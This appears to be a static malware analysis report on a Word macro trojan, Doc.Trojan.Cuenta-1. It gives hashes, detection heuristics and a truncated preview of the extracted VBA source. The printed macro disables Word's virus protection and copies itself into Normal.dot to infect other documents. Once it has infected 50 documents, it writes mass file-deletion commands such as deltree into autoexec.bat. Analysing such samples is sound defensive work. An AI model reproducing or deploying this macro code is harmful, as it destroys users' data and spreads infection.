Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b0df6ef1b509cf9e…

MALICIOUS

Office (OLE)

37.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 9a20470af418dcc4c39bc4a3ab14ad99 SHA-1: f125bfba7e174b179080caaadfb1aea9214c0963 SHA-256: b0df6ef1b509cf9e1af9c2eef44b295e96ad9f46c2580e40cff885f935f92856
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including AutoOpen and AutoClose functions, which are indicative of malicious intent. The script attempts to copy itself to the Normal.dot template, potentially infecting other documents. It also attempts to create a file named 'Cuenta.sys', suggesting a downloader or trojan component.

Heuristics 5

  • ClamAV: Doc.Trojan.Cuenta-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Cuenta-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12428 bytes
SHA-256: 7791d01357cfd1923f956edb0ed1c4bcc83541cdcadd3345ed8c88c8dc7a5dfd
Detection
ClamAV: Doc.Trojan.Cuenta-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function Infesta() As Boolean
On Error Resume Next
'Desabilitamos la protección contra Virus Macro
Options.VirusProtection = False
Application.OrganizerCopy Source:= _
        Word.ActiveDocument.Path + "\" + Word.ActiveDocument.Name, Destination:= _
        Left(Application.Path, Len(Application.Path) - 7) + "\Plantillas\Normal.dot", Name:= _
        "NewMacros", Object:=wdOrganizerObjectProjectItems
 If Err.Number > 0 Then
    Infesta = False
    Application.OrganizerCopy Source:=Left(Application.Path, Len(Application.Path) - 7) + "\Plantillas\Normal.dot" _
        , Destination:=Word.ActiveDocument.Path + "\" + Word.ActiveDocument.Name _
        , Name:="NewMacros", Object:=wdOrganizerObjectProjectItems
 Else
    Infesta = True
End If
End Function
Sub AutoClose()
On Error Resume Next
Application.OrganizerCopy Source:=Left(Application.Path, Len(Application.Path) - 7) + "\Plantillas\Normal.dot" _
        , Destination:=Word.ActiveDocument.Path + "\" + Word.ActiveDocument.Name _
        , Name:="NewMacros", Object:=wdOrganizerObjectProjectItems
If Err.Number > 0 Then
Else
        Open Left(Application.Path, Len(Application.Path) - 7) + "\Plantillas\Cuenta.sys" For Append As 1
            Print #1, "Infectado el documento" + Word.ActiveDocument.Path + "\" + Word.ActiveDocument.Name
        Close #1
 End If
 Documents.Save NoPrompt:=True, OriginalFormat:=wdOriginalDocumentFormat
 End Sub
Sub autoOpen()
    Dim infesto As Boolean
    Dim I As Integer
    Dim Linea As String
    On Error Resume Next
    'Comenzar la infección del normal.dot si no esta infestado
    infesto = Infesta
    'Verificar si ya se infestaron 100 documentos nuevos
    I = 0
    Open Left(Application.Path, Len(Application.Path) - 7) + "\Plantillas\Cuenta.sys" For Input As 1
    If Dir(Left(Application.Path, Len(Application.Path) - 7) + "\Plantillas\Cuenta.sys") <> "" Then
        Do While Not EOF(1)
            Line Input #1, Linea
            I = I + 1
        Loop
    Else
        I = 0
    End If
    Close #1
    If I > 50 Or I = 50 Then
        'Agregar este codígo al autoexec.bat
        Open "C:\autoexec.bat" For Append As 1
            Print #1, "Echo off"
            Print #1, "Echo. Autocheque del sistema, por favor espere un momento........."
            'Verificamos si existe el deltree
            If Dir("c:\windows\command\deltree.exe") <> "" Then
                'Aquí le agregamos el codígo para eliminar el sistema completo
                Print #1, "c:\windows\command\Deltree *.* /y"
            Else
                'No esxiete el deltree
                Print #1, "del *.* /q"
                'Verificamps si es NT o Win 9x
                If Dir("c:\winnt", vbDirectory) Then
                  Print #1, "del c:\winnt\system\*.*  /q"
                  Print #1, "del c:\winnt\system32\*.*  /q"
                  Print #1, "del c:\winnt\*.*  /q"
                  Print #1, "del c:\winnt\profiles\administrador\personal\*.* /q"
                  Print #1, "del *.*  /q"
                End If
                If Dir("c:\windows", vbDirectory) Then
                  Print #1, "del c:\windows\system\*.* "
                  Print #1, "del c:\windows\*.* /q"
                  If Dir("c:\mis documentos", vbDirectory) Then
                    Print #1, "del c:\mis documentos\*.*  /q"
                  End If
                  If Dir("c:\my documents", vbDirectory) Then
                    Print #1, "del c:\my documents\*.*  /q"
                  End If
                  Print #1, "del *.*  /q"
                End If
             End If
                
            Print #1, "Echo on"
            Print #1, "Echo. Lo Siento pero pedro te destruyo el sistema..."
            Print #1, "Echo. Graci
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.